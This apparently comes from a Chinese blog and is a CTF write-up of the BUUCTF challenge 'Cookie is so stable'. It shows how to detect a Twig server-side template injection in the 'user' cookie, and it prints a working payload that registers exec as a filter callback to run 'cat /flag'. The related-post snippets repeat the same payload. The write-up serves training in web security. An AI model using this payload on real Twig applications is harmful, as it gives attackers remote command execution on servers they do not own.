BUUCTF:[BJDCTF2020]Cookie is so stable

最新推荐文章于 2023-04-03 20:01:35 发布
最新推荐文章于 2023-04-03 20:01:35 发布
阅读量274 收藏 1
点赞数
分类专栏: CTF_Web_Writeup BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/111818605
版权

在这里插入图片描述
打开后发现有一个flag选项卡,进去后发现有一个输入框
在这里插入图片描述
简单测试一下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现存在着模板注入
(别的师傅那copy的流程图)
在这里插入图片描述

如果是Twig,输入{{7*'7'}} 输出49
如果是Jinja,输入{{7*'7'}}  输出7777777

这题是Twig
在hint.php的源码中,对我们进行了提示
在这里插入图片描述
我们进行抓包,然后发现cookie里的user是注入点,直接构造payload

user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
#registerUndefinedFilterCallback("exec") 将exec传入到全局数组中
#getFilter("cat /flag")把语句传入到参数
最后实现了在函数中func("exec", "cat /flag")的执行

在这里插入图片描述
flag:

flag{b09f3206-7671-4fe7-a669-c944f97dc948}
FW_ENJOEY
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
cookie:HTTP服务器cookie解析和序列化
02-03
使用完成 : $ npm install cookieAPI var cookie = require ( 'cookie' ) ;cookie.parse(str,选项) 解析HTTP Cookie标头字符串,并返回所有cookie名称-值对的对象。 str参数是表示Cookie标头值的字符串,而...
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 690
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
[BJDCTF2020]Cookie is so stable
qq_52907838的博客
08-03 124
打开环境,除了主页面有两个页面,flag.php和hint.php。flag.php是一个输入框: 在hint.php的源代码中发现: 让我们看看cookies,那就随便输入看下cookies: 修改值随便尝试下,发现不是SQL注入也不是xss,那这时就想到可能是模板注入。 验证方式是输入{{7*7}},如果显示49,说明是Twig;如果显示7777777说明是jinja2, ...
BUUCTF】[BJDCTF2020]Cookie is so stable
aoao331198的博客
04-30 225
flag页面比较容易看出来存在SSTI 看见有wp说是Twig模板注入,copy一下判断方法 尝试{{7*7}}, 返回49 尝试{{7*‘7’}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板 不同的模板的攻击方式不同,贴一个好文章 一篇文章带你理解漏洞之 SSTI 漏洞 用PL {{_self.env.registerUndefinedFilterCallback("exec")}} {{_self.env.getFilter("id")}} 但是在输入框.
第四十七题——[BJDCTF2020]Cookie is so stable
分享简单的安全技术
04-27 187
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,在导航条看到flag链接,点击后要求提交用户名 第二步:查找漏洞点 输入admin没有反应 输入{{7*'7'}}后出现49,而不是7777777,说明是使用Twig模板而不是Jinja2 第三步:了解Twig漏洞后获取flag Twing漏洞 输入123使用burpsuite抓包,结合题目提示cookie,确定user有问题 修改user值为:{{_self.env.register
cookie-plugin:WordPress GDPR Cookie横幅插件
03-18
**WordPress GDPR Cookie横幅插件详解** 随着欧洲通用数据保护条例(GDPR)的实施,网站所有者必须确保他们的在线平台符合数据隐私法规。Cookie-plugin是专为WordPress设计的一款插件,旨在帮助用户轻松实现这一...
ngx-cookieconsent:Angular的Cookie同意模块
02-01
(需要Cookie同意3或更高版本,已通过3.1.0测试) 安装 通过npm安装以上依赖项。 特别是对于Cookie Consent : npm install --save cookieconsent 现在通过以下方式安装ngx-cookieconsent : npm install --save...
Cookie-Editor:Safari的Cookie编辑器扩展
03-21
**Cookie-Editor:Safari浏览器Cookie管理扩展** Cookie-Editor是一款专为Safari浏览器设计的Cookie编辑工具,它允许用户方便地查看、编辑和管理浏览器中的Cookie数据。这对于开发者进行网页应用测试、调试或者普通...
SVM支持向量机分类鸢尾花数据集iris及代码
09-30
SVM支持向量机分类鸢尾花数据集iris及代码,数据集有Excel、data、txt文件格式,代码有data、txt格式演示
BUUCTF [BJDCTF2020]Cookie is so stable
Chu_Jian_Xiong的博客
10-10 173
[BJDCTF2020]Cookie is so stable模板注入Payload获取flag 模板注入 打开题目 直奔主题吧 发现回显和输入是一样的,猜想是模板注入 这里引入个模板注入流程图 经过测试可以发现该模板应该是Twig,直接去拿对应的Payload Payload {{_self.env.registerUndefinedFilterCallback("exec")}{{_self.env.getFilter("id")}} 获取flag 用burp做 查看根目录发现只给一个条
Buuctf (cookie)[BSidesCF 2019]Kookie 1
m0_64444909的博客
06-24 717
引入:cookie 是一个非常具体的东西,指的就是浏览器里面能永久存储的一种数据。跟服务器没啥关系,仅仅是浏览器实现的一种数据存储功能。 cookie由服务器生成,发送给浏览器,浏览器把cookie以KV形式存储到某个目录下的文本文件中,下一次请求同一网站时会把该cookie发送给服务器。添加cookie有两个方法:法一法二...
BUUCTF-web类-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 863
BUUCTF-web类-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
BUUCTF之[BJDCTF2020]Cookie is so stable ----- SSTI注入
weixin_44632787的博客
06-26 1540
BUUCTF之[BJDCTF2020]Cookie is so stable 题目 知识点:服务端模板注入攻击。SSTI里的Twig攻击。从网上找来的图片。参考链接:服务端模板注入攻击 然后网上提示说: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 然后这题是 Twig 模块,用到的payload是: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_sel
Uncaught ReferenceError: cookie is not defined
最新发布
01-25
Uncaught ReferenceError: cookie is not defined错误通常是因为在代码中使用了未定义的cookie变量。这可能是由于以下几个原因导致的: 1. 拼写错误:请确保你在代码中正确地拼写了cookie变量。检查是否有任何拼写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值